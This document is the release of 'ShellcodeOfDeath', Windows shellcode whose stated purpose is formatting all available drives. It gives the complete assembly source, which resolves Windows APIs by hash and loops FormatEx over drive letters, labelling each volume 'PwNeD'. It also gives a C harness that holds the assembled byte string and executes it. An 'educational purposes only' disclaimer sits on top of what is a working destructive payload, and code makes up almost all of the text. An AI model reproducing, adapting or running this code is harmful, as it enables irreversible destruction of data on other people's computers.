ShellcodeOfDeath has been designed to format all the available drives on Windows. Disclaimer: This shellcode is developed for educational purposes only. The author is not and will not hold any responsibility for any illegal or unauthorized use of #ShellcodeOfDeath. Any use of this shellcode is at the reader’s own risk. Home Page: http://hacksys.vfreaks.com/ Post Link: http://hacksys.vfreaks.com/research/shellcode-of-death.html You may download the Shellcode Of Death archive from the above link. ====================================================================== Start Of Code - ShellcodeOfDeath.s ====================================================================== /* * _ __ _____ * /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___ * / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \ * / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | | * \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_| * |___/ * http://hacksys.vfreaks.com/ * hacksysteam@hotmail.com * * Shellcode Of Death * v1.0 * * Ruei-Min Jiang (@mike820324) a.k.a MicroMike * Ashfaq Ansari (ashfaq_ansari1989@hotmail.com) * * Still a lot can be done to improve this shellcode. This is the first release. * Further, a lot of improvement and optimization can be done to this shellcode. * Any bugs, suggestions or contributions are most welcome. * * Length of shellcode: 387 bytes * Number of NULL bytes: 49 * * Notes: There are more NULL bytes due to the fact that a few of the Windows APIs used * accept input in UNICODE format. Still, NULL bytes can be reduced further. * We can use any simple encoder to xor encode the shellcode and eventually * eliminate NULL bytes. * * Things to do: * 1. Code cleanup * 2. Optimization * 3. Minification * 4. 
Add suggestions */ .globl _main _main: jmp start_shell; /* * %edx store the base address of kernel32.dll (input) * %ebx points to the start of symbal name table (input) * %ecx contains the destination hash value (input) * %eax is the index_counter (output) */ hash_function: xorl %eax,%eax; next_entry: mov (%ebx,%eax,4), %esi; addl %edx, %esi; push %ebx; push %eax; xor %ebx, %ebx; continue_hash: xor %eax, %eax; lodsb; rol $5, %ebx; addl %eax, %ebx; cmp $0, %eax; jnz continue_hash; ror $5, %ebx; cmp %ecx, %ebx; pop %eax; pop %ebx; je hash_finish; inc %eax; jmp next_entry; hash_finish: ret; /* * input: * set %edx to the dll base address * set %ecx as the hash value you want to compare * output: * %eax is the API address */ get_address: PE_init: movl %edx, %eax; movl 0x3c(%eax), %eax; movl 0x78(%edx, %eax), %eax; leal (%edx, %eax), %eax; pushl %eax; movl 0x20(%eax), %eax; leal (%edx, %eax), %ebx; call hash_function; popl %ebx; movl 0x24(%ebx), %ecx; leal (%edx, %ecx), %ecx; movw (%ecx, %eax, 2), %ax; andl $0x0000ffff, %eax; movl 0x1c(%ebx), %ebx; leal (%edx, %ebx), %ebx; movl (%ebx, %eax, 4), %eax; leal (%edx, %eax), %eax; ret; /* * hash value for each API * LoadLibraryA = 0x331adddc * CloseHandle = 0xd7629096 * CreateFileA = 0xcfb0e506 * ExitProcess = 0xec468f87 * Sleep = 0x567a110 * DeviceIOControl = 0x3b34d4a7 * --------------fmifs.dll--------------- * FormatEx = 0xab025b64 */ start_shell: set_Kernel32_env: xorl %ecx, %ecx movl %fs:0x30, %eax; movl 0xc(%eax), %eax; movl 0x1c(%eax), %eax; next_module: movl 0x8(%eax), %edx; movl 0x20(%eax), %edi; movl (%eax), %eax; cmp 0x18(%edi), %cl; jne next_module; set_hash_table: pushl $0xab025b64; pushl $0x0567a110; pushl $0x3b34d4a7; pushl $0xd7629096; pushl $0xec468f87; pushl $0xcfb0e506; pushl $0x331adddc; movl %esp, %ebp; end_hash_table: set_api_table: init_variable: pushl $7; popl %ecx; xorl %edi, %edi; loop_start: cmp $1, %ecx; jne set_kernel32_api; set_fmifs_env: pushl %ecx; jmp data_string; back_to_here: 
restore_loadlibrary: movl 0x1c(%esp), %eax; call *%eax; movl %eax, %edx; popl %ecx; set_kernel32_api: pushl %ecx; movl (%ebp, %edi, 4), %ecx; call get_address; popl %ecx; pushl %eax; inc %edi; loop loop_start; movl %esp, %ebp; jmp start_main_code; data_string: call back_to_here; .string "fmifs.dll"; start_main_code: Get_string_addr: jmp 2f; 1:; popl %esi; Format_start_loop: pushl $23; popl %ecx; format_loop_start: movl %ecx, %edi; CreateFile_call: xorl %edx, %edx; pushl %edx; pushl %edx; pushl $3; pushl %edx; pushl $3; pushl $0xc0000000; pushl %esi; movl 0x14(%ebp), %ebx; call *%ebx; Store_File_Handle: pushl %eax; subl $0x4, %esp; xorl %edx, %edx; DeviceIOControl_call: pushl %edx; leal 0x4(%esp), %ebx pushl %ebx; pushl %edx; pushl %edx; pushl %edx; pushl %edx; pushl $0x90020; pushl %eax; movl 0x8(%ebp), %ebx call *%ebx; close_file_handle: pushl 0x4(%esp); movl 0xc(%ebp), %ebx; call *%ebx; FormatEx_call: leal call_back-string_start(%esi),%eax; pushl %eax; pushl $4096; pushl $1; leal volume_label-string_start(%esi), %eax; pushl %eax; leal string2_start-string_start(%esi), %eax; pushl %eax; pushl $0xc; leal 0x8(%esi), %eax; pushl %eax; movl (%ebp), %ebx; call *%ebx; sleep_call: pushl $200; movl 0x4(%ebp), %ebx call *%ebx; loop_end: movl %edi, %ecx addl $1, 0x8(%esi); loop format_loop_start; exit_process: push $0; movl 0x10(%ebp), %ebx; call *%ebx; 2:; call 1b; string_start: .byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00 string2_start: .byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00 /* * Volume Label * Set the name of the Volume label * after formatting the respective volume. * Modify volume_label as you desire. 
* Deafult value -- PwNeD */ volume_label: .byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00 call_back: push %ebp; movl %esp, %ebp; xorl %eax, %eax; inc %eax; pop %ebp; ret $0xc; ====================================================================== End Of Code - ShellcodeOfDeath.s ====================================================================== ====================================================================== Testing Shellcode - ShellcodeTestUnEncoded.c ====================================================================== #include #include /* _ __ _____ /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___ / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \ / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | | \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_| |___/ http://hacksys.vfreaks.com/ hacksysteam@hotmail.com Module Name: Shellcode Test Encoded Abstract: This program is used as a template to test C style formatted shellcodes. A decoder is already added to the final shellcode output. 
IDE: Dev-C++ 4.9.9.2 (Windows XP SP3) Compiler: gcc 3.4.2 */ unsigned char shellcode[] = "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50" "\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b" "\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20" "\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff" "\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00" "\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64" "\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46" "\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75" "\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff" "\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64" "\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00" "\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52" "\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff" "\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10" "\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50" "\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46" "\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00" "\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08" "\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8" "\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c" "\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00" "\x54\x00\x46\x00\x53\x00\x00\x00" // Volume Label. You may want to change this. 
// Default: PwNeD "\x50\x00\x77\x00\x4e\x00\x65\x00\x44\x00" // Volume Label End "\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"; main() { int i, badchar_c = 0; printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1); for(i = 0; i < sizeof(shellcode)-1; ++i) { if(((unsigned char *)shellcode)[i] == 0x00) { badchar_c = badchar_c + 1; } } printf("\nNumber of badchar: %d\n\n", badchar_c); printf("\nPress any key to execute shellcode....\n\n"); getch(); int (*ret)() = (int(*)())shellcode; ret(); } ====================================================================== End Testing Shellcode - ShellcodeTestUnEncoded.c ======================================================================